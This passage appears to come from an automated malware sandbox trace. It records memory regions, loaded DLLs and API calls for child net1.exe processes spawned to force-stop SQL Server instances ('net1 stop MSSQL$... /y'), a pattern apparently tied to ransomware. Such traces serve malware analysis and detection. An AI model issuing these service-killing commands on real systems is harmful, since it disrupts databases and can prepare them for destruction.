0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7986 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7987 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 7988 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 7989 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 7990 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7991 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7992 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7993 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7994 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7995 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7996 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7997 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 644 os_tid = 0xb90 [0104.451] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fd70 | out: lpSystemTimeAsFileTime=0x12fd70*(dwLowDateTime=0xf36856d0, dwHighDateTime=0x1d48689)) [0104.451] GetCurrentProcessId () returned 0xb3c [0104.451] GetCurrentThreadId () returned 0xb90 [0104.451] GetTickCount () returned 0x23dca [0104.451] QueryPerformanceCounter (in: lpPerformanceCount=0x12fd78 | out: lpPerformanceCount=0x12fd78*=1815136900000) returned 1 [0104.453] GetModuleHandleW (lpModuleName=0x0) returned 0xff6d0000 [0104.453] __set_app_type (_Type=0x1) [0104.453] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff6e9c9c) returned 0x0 [0104.453] __getmainargs (in: _Argc=0xff6f4780, _Argv=0xff6f4790, _Env=0xff6f4788, _DoWildCard=0, _StartInfo=0xff6f479c | out: _Argc=0xff6f4780, _Argv=0xff6f4790, _Env=0xff6f4788) returned 0 [0104.453] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0104.453] GetConsoleOutputCP () returned 0x1b5 [0104.453] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff6fcec0 | out: lpCPInfo=0xff6fcec0) returned 1 [0104.454] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0104.456] sprintf_s (in: _DstBuf=0x12fd18, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0104.456] setlocale (category=0, locale=".437") returned="English_United States.437" [0104.457] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.457] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0104.457] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SYSTEM_BGC /y" [0104.458] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fab0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0104.458] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0104.458] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12fd08 | out: Buffer=0x12fd08*=0x324d50) returned 0x0 [0104.458] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12fd08 | out: Buffer=0x12fd08*=0x32c100) returned 0x0 [0104.458] _fileno (_File=0x7fefdba2a80) returned 0 [0104.458] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0104.458] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0104.458] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0104.458] _wcsicmp (_String1="config", _String2="stop") returned -16 [0104.458] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0104.458] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0104.458] _wcsicmp (_String1="file", _String2="stop") returned -13 [0104.458] _wcsicmp (_String1="files", _String2="stop") returned -13 [0104.458] _wcsicmp (_String1="group", _String2="stop") returned -12 [0104.458] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0104.458] _wcsicmp (_String1="help", _String2="stop") returned -11 [0104.458] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0104.459] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0104.459] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0104.459] _wcsicmp (_String1="session", _String2="stop") returned -15 [0104.459] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0104.459] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0104.459] _wcsicmp (_String1="share", _String2="stop") returned -12 [0104.459] _wcsicmp (_String1="start", _String2="stop") returned -14 [0104.459] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0104.459] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0104.459] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0104.459] _wcsicmp (_String1="accounts", _String2="MSSQL$SYSTEM_BGC") returned -12 [0104.459] _wcsicmp (_String1="computer", _String2="MSSQL$SYSTEM_BGC") returned -10 [0104.459] _wcsicmp (_String1="config", _String2="MSSQL$SYSTEM_BGC") returned -10 [0104.459] _wcsicmp (_String1="continue", _String2="MSSQL$SYSTEM_BGC") returned -10 [0104.459] _wcsicmp (_String1="cont", _String2="MSSQL$SYSTEM_BGC") returned -10 [0104.459] _wcsicmp (_String1="file", _String2="MSSQL$SYSTEM_BGC") returned -7 [0104.459] _wcsicmp (_String1="files", _String2="MSSQL$SYSTEM_BGC") returned -7 [0104.459] _wcsicmp (_String1="group", _String2="MSSQL$SYSTEM_BGC") returned -6 [0104.459] _wcsicmp (_String1="groups", _String2="MSSQL$SYSTEM_BGC") returned -6 [0104.459] _wcsicmp (_String1="help", _String2="MSSQL$SYSTEM_BGC") returned -5 [0104.459] _wcsicmp (_String1="helpmsg", _String2="MSSQL$SYSTEM_BGC") returned -5 [0104.459] _wcsicmp (_String1="localgroup", _String2="MSSQL$SYSTEM_BGC") returned -1 [0104.459] _wcsicmp (_String1="pause", _String2="MSSQL$SYSTEM_BGC") returned 3 [0104.459] _wcsicmp (_String1="session", _String2="MSSQL$SYSTEM_BGC") returned 6 [0104.459] _wcsicmp (_String1="sessions", _String2="MSSQL$SYSTEM_BGC") returned 6 [0104.459] _wcsicmp (_String1="sess", _String2="MSSQL$SYSTEM_BGC") returned 6 [0104.459] _wcsicmp (_String1="share", _String2="MSSQL$SYSTEM_BGC") returned 6 [0104.459] _wcsicmp (_String1="start", _String2="MSSQL$SYSTEM_BGC") returned 6 [0104.459] _wcsicmp (_String1="stats", _String2="MSSQL$SYSTEM_BGC") returned 6 [0104.459] _wcsicmp (_String1="statistics", _String2="MSSQL$SYSTEM_BGC") returned 6 [0104.459] _wcsicmp (_String1="stop", _String2="MSSQL$SYSTEM_BGC") returned 6 [0104.460] _wcsicmp (_String1="time", _String2="MSSQL$SYSTEM_BGC") returned 7 [0104.460] _wcsicmp (_String1="user", _String2="MSSQL$SYSTEM_BGC") returned 8 [0104.460] _wcsicmp (_String1="users", _String2="MSSQL$SYSTEM_BGC") returned 8 [0104.460] _wcsicmp (_String1="msg", _String2="MSSQL$SYSTEM_BGC") returned -12 [0104.460] _wcsicmp (_String1="messenger", _String2="MSSQL$SYSTEM_BGC") returned -14 [0104.460] _wcsicmp (_String1="receiver", _String2="MSSQL$SYSTEM_BGC") returned 5 [0104.460] _wcsicmp (_String1="rcv", _String2="MSSQL$SYSTEM_BGC") returned 5 [0104.460] _wcsicmp (_String1="netpopup", _String2="MSSQL$SYSTEM_BGC") returned 1 [0104.460] _wcsicmp (_String1="redirector", _String2="MSSQL$SYSTEM_BGC") returned 5 [0104.460] _wcsicmp (_String1="redir", _String2="MSSQL$SYSTEM_BGC") returned 5 [0104.460] _wcsicmp (_String1="rdr", _String2="MSSQL$SYSTEM_BGC") returned 5 [0104.460] _wcsicmp (_String1="workstation", _String2="MSSQL$SYSTEM_BGC") returned 10 [0104.460] _wcsicmp (_String1="work", _String2="MSSQL$SYSTEM_BGC") returned 10 [0104.460] _wcsicmp (_String1="wksta", _String2="MSSQL$SYSTEM_BGC") returned 10 [0104.460] _wcsicmp (_String1="prdr", _String2="MSSQL$SYSTEM_BGC") returned 3 [0104.460] _wcsicmp (_String1="devrdr", _String2="MSSQL$SYSTEM_BGC") returned -9 [0104.460] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SYSTEM_BGC") returned -1 [0104.460] _wcsicmp (_String1="server", _String2="MSSQL$SYSTEM_BGC") returned 6 [0104.460] _wcsicmp (_String1="svr", _String2="MSSQL$SYSTEM_BGC") returned 6 [0104.460] _wcsicmp (_String1="srv", _String2="MSSQL$SYSTEM_BGC") returned 6 [0104.460] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SYSTEM_BGC") returned -1 [0104.460] _wcsicmp (_String1="alerter", _String2="MSSQL$SYSTEM_BGC") returned -12 [0104.460] _wcsicmp (_String1="netlogon", _String2="MSSQL$SYSTEM_BGC") returned 1 [0104.460] _wcsupr (in: _String="MSSQL$SYSTEM_BGC" | out: _String="MSSQL$SYSTEM_BGC") returned="MSSQL$SYSTEM_BGC" [0104.461] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x32ce10 [0104.484] GetServiceKeyNameW (in: hSCManager=0x32ce10, lpDisplayName="MSSQL$SYSTEM_BGC", lpServiceName=0xff6f5750, lpcchBuffer=0x12fc28 | out: lpServiceName="", lpcchBuffer=0x12fc28) returned 0 [0104.485] _wcsicmp (_String1="msg", _String2="MSSQL$SYSTEM_BGC") returned -12 [0104.485] _wcsicmp (_String1="messenger", _String2="MSSQL$SYSTEM_BGC") returned -14 [0104.485] _wcsicmp (_String1="receiver", _String2="MSSQL$SYSTEM_BGC") returned 5 [0104.485] _wcsicmp (_String1="rcv", _String2="MSSQL$SYSTEM_BGC") returned 5 [0104.486] _wcsicmp (_String1="redirector", _String2="MSSQL$SYSTEM_BGC") returned 5 [0104.486] _wcsicmp (_String1="redir", _String2="MSSQL$SYSTEM_BGC") returned 5 [0104.486] _wcsicmp (_String1="rdr", _String2="MSSQL$SYSTEM_BGC") returned 5 [0104.486] _wcsicmp (_String1="workstation", _String2="MSSQL$SYSTEM_BGC") returned 10 [0104.486] _wcsicmp (_String1="work", _String2="MSSQL$SYSTEM_BGC") returned 10 [0104.486] _wcsicmp (_String1="wksta", _String2="MSSQL$SYSTEM_BGC") returned 10 [0104.486] _wcsicmp (_String1="prdr", _String2="MSSQL$SYSTEM_BGC") returned 3 [0104.486] _wcsicmp (_String1="devrdr", _String2="MSSQL$SYSTEM_BGC") returned -9 [0104.486] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SYSTEM_BGC") returned -1 [0104.486] _wcsicmp (_String1="server", _String2="MSSQL$SYSTEM_BGC") returned 6 [0104.486] _wcsicmp (_String1="svr", _String2="MSSQL$SYSTEM_BGC") returned 6 [0104.486] _wcsicmp (_String1="srv", _String2="MSSQL$SYSTEM_BGC") returned 6 [0104.486] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SYSTEM_BGC") returned -1 [0104.486] _wcsicmp (_String1="alerter", _String2="MSSQL$SYSTEM_BGC") returned -12 [0104.486] _wcsicmp (_String1="netlogon", _String2="MSSQL$SYSTEM_BGC") returned 1 [0104.486] NetServiceControl (in: servername=0x0, service="MSSQL$SYSTEM_BGC", opcode=0x0, arg=0x0, bufptr=0x12fc30 | out: bufptr=0x12fc30) returned 0x889 [0104.487] wcscpy_s (in: _Destination=0xff6f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0104.487] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0104.488] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff6f5b50, nSize=0x800, Arguments=0xff6f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0104.489] GetFileType (hFile=0xb) returned 0x2 [0104.490] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12faf8 | out: lpMode=0x12faf8) returned 1 [0104.490] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff6f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x12faf0, lpReserved=0x0 | out: lpBuffer=0xff6f5b50*, lpNumberOfCharsWritten=0x12faf0*=0x1e) returned 1 [0104.490] GetFileType (hFile=0xb) returned 0x2 [0104.490] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12faf8 | out: lpMode=0x12faf8) returned 1 [0104.491] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff6d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12faf0, lpReserved=0x0 | out: lpBuffer=0xff6d1efc*, lpNumberOfCharsWritten=0x12faf0*=0x2) returned 1 [0104.491] _ultow (in: _Dest=0x889, _Radix=1244000 | out: _Dest=0x889) returned="2185" [0104.491] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff6f5b50, nSize=0x800, Arguments=0xff6f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0104.491] GetFileType (hFile=0xb) returned 0x2 [0104.491] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12faf8 | out: lpMode=0x12faf8) returned 1 [0104.492] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff6f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x12faf0, lpReserved=0x0 | out: lpBuffer=0xff6f5b50*, lpNumberOfCharsWritten=0x12faf0*=0x34) returned 1 [0104.492] GetFileType (hFile=0xb) returned 0x2 [0104.492] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12faf8 | out: lpMode=0x12faf8) returned 1 [0104.492] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff6d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12faf0, lpReserved=0x0 | out: lpBuffer=0xff6d1efc*, lpNumberOfCharsWritten=0x12faf0*=0x2) returned 1 [0104.493] NetApiBufferFree (Buffer=0x324d50) returned 0x0 [0104.493] NetApiBufferFree (Buffer=0x32c100) returned 0x0 [0104.493] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SYSTEM_BGC /y" [0104.493] exit (_Code=2) Process: id = "197" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5a446000" os_pid = "0x49c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "191" os_parent_pid = "0xc58" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7917 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7918 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7919 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7920 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 7921 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7922 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7923 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7924 start_va = 0xff6d0000 end_va = 0xff702fff entry_point = 0xff6d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 7925 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7926 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7927 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 7928 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 7929 start_va = 0x80000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 7930 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7931 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7950 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7951 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7952 start_va = 0x250000 end_va = 0x2b6fff entry_point = 0x250000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7953 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 7954 start_va = 0x480000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 7955 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7956 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7957 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 7958 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 7959 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 7960 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7961 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7962 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7963 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 7964 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 7965 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 7966 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7967 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7968 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7969 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7970 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7971 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7972 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7973 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 645 os_tid = 0x814 [0104.398] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f870 | out: lpSystemTimeAsFileTime=0x24f870*(dwLowDateTime=0xf36132b0, dwHighDateTime=0x1d48689)) [0104.398] GetCurrentProcessId () returned 0x49c [0104.398] GetCurrentThreadId () returned 0x814 [0104.398] GetTickCount () returned 0x23d9b [0104.398] QueryPerformanceCounter (in: lpPerformanceCount=0x24f878 | out: lpPerformanceCount=0x24f878*=1815131700000) returned 1 [0104.400] GetModuleHandleW (lpModuleName=0x0) returned 0xff6d0000 [0104.400] __set_app_type (_Type=0x1) [0104.400] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff6e9c9c) returned 0x0 [0104.400] __getmainargs (in: _Argc=0xff6f4780, _Argv=0xff6f4790, _Env=0xff6f4788, _DoWildCard=0, _StartInfo=0xff6f479c | out: _Argc=0xff6f4780, _Argv=0xff6f4790, _Env=0xff6f4788) returned 0 [0104.401] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0104.401] GetConsoleOutputCP () returned 0x1b5 [0104.401] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff6fcec0 | out: lpCPInfo=0xff6fcec0) returned 1 [0104.401] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0104.403] sprintf_s (in: _DstBuf=0x24f818, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0104.403] setlocale (category=0, locale=".437") returned="English_United States.437" [0104.405] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.405] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0104.405] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$TPS /y" [0104.405] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24f5b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0104.405] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0104.405] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24f808 | out: Buffer=0x24f808*=0x94d50) returned 0x0 [0104.405] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24f808 | out: Buffer=0x24f808*=0x9c0f0) returned 0x0 [0104.405] _fileno (_File=0x7fefdba2a80) returned 0 [0104.405] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0104.406] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0104.406] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0104.406] _wcsicmp (_String1="config", _String2="stop") returned -16 [0104.406] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0104.406] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0104.406] _wcsicmp (_String1="file", _String2="stop") returned -13 [0104.406] _wcsicmp (_String1="files", _String2="stop") returned -13 [0104.406] _wcsicmp (_String1="group", _String2="stop") returned -12 [0104.406] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0104.406] _wcsicmp (_String1="help", _String2="stop") returned -11 [0104.406] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0104.406] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0104.406] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0104.406] _wcsicmp (_String1="session", _String2="stop") returned -15 [0104.406] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0104.406] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0104.406] _wcsicmp (_String1="share", _String2="stop") returned -12 [0104.406] _wcsicmp (_String1="start", _String2="stop") returned -14 [0104.406] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0104.406] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0104.406] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0104.406] _wcsicmp (_String1="accounts", _String2="MSSQL$TPS") returned -12 [0104.406] _wcsicmp (_String1="computer", _String2="MSSQL$TPS") returned -10 [0104.406] _wcsicmp (_String1="config", _String2="MSSQL$TPS") returned -10 [0104.406] _wcsicmp (_String1="continue", _String2="MSSQL$TPS") returned -10 [0104.407] _wcsicmp (_String1="cont", _String2="MSSQL$TPS") returned -10 [0104.407] _wcsicmp (_String1="file", _String2="MSSQL$TPS") returned -7 [0104.407] _wcsicmp 